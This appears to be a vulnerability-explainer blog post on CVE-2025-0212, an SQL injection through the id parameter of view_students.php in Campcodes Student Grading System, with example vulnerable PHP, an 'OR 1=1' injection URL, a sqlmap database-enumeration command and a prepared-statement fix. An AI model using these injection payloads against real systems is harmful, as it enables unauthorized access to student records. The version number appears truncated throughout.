CVE-2025-0212 - Critical SQL Injection Vulnerability in Campcodes Student Grading System 1. (view_students.php) — Details & Exploit

A major security flaw, classified as CVE-2025-0212, has been identified and confirmed in the Campcodes Student Grading System version 1.. The vulnerability impacts an essential part of the software—the /view_students.php file—via insufficiently sanitized input through the id parameter. This issue makes it possible for an unauthenticated, remote attacker to execute arbitrary SQL queries on the back-end database, potentially giving them access to or control over sensitive student data. We break down how this vulnerability works, provide a code example, and offer references for further reading.

What Is CVE-2025-0212?

CVE-2025-0212 is an SQL Injection vulnerability found in the Campcodes Student Grading System (SGS) 1.. The flaw allows a remote attacker to manipulate the id parameter in the URL to inject SQL code into the database request. This can lead to sensitive data leakage, data modification, or even full system compromise depending on the privileges of the database user.

The problem lies in the way /view_students.php processes URLs like

http://target-site.com/view_students.php?id=123

If the id argument is not properly sanitized (i.e., filtered for malicious code), an attacker can append SQL statements and trick the web server into running them.

In the vulnerable view_students.php file, code might look like this

<?php
  // Grabbing the ID directly from the URL
  $id = $_GET['id'];

  // Querying the database without sanitizing the input!
  $query = "SELECT * FROM students WHERE id = $id";
  $result = mysqli_query($connection, $query);

  // Display student info, etc.
?>

Here, the $id parameter from the URL is directly inserted into the SQL query. If an attacker enters 1 OR 1=1, the query becomes:

SELECT * FROM students WHERE id = 1 OR 1=1

This will return all rows instead of the single one intended!

How Can Attackers Exploit This?

Someone can easily exploit this flaw just by using a web browser or tools like curl or sqlmap. Here’s a demonstration.

Navigating to the following URL could give away all student records

http://target-site.com/view_students.php?id=1%20OR%201%3D1

Using sqlmap

sqlmap -u "http://target-site.com/view_students.php?id=1"; --dbs

This command automatically detects the vulnerability and tries to pull database names.

Data Modification: SQL injection can let attackers alter, remove, or insert new records.

- Authentication Bypass: Attackers could potentially bypass logins if those rely on similar queries.
- Full Compromise: If the database user has FILE privileges, attackers might upload malicious scripts.

Patch & Prevention

Developers should always validate and sanitize user inputs. Using prepared statements (parameterized queries) is key.

How to Fix:

Replace vulnerable code with this

<?php
  $stmt = $connection->prepare("SELECT * FROM students WHERE id = ?");
  $stmt->bind_param("i", $_GET['id']);
  $stmt->execute();
  $result = $stmt->get_result();
?>

References

- Original Exploit Disclosure (packetstormsecurity.org)
- CVE ID: CVE-2025-0212 on NIST *(search for CVE-2025-0212)*
- Campcodes Student Grading System Homepage

Final Notes

CVE-2025-0212 is a critical vulnerability and should be patched immediately. If you run Campcodes Student Grading System 1., update your code to use parameterized queries. For more information, always monitor the NVD and exploit databases.

If you found this exclusive breakdown helpful, bookmark this post and share it with your IT security contacts! Stay safe!

Timeline

Published on: 01/04/2025 16:15:23 UTC
Last modified on: 01/10/2025 18:57:05 UTC